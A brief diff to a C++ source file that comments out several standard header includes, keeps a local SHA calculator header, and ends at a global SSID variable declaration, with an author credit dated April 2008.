@@ -44,12 +44,12 @@
         
         April 2008 - wyse101 0x40 gmail.com
  */
-#include <cstdio>
+//#include <cstdio>
 //#include <cstdlib>
-#include <cstring>
+//#include <cstring>
 #include <string>
-#include <cctype>
-#include <ctime>
+//#include <cctype>
+//#include <ctime>
 #include "shacalculator.h"
 
 unsigned long ssid;
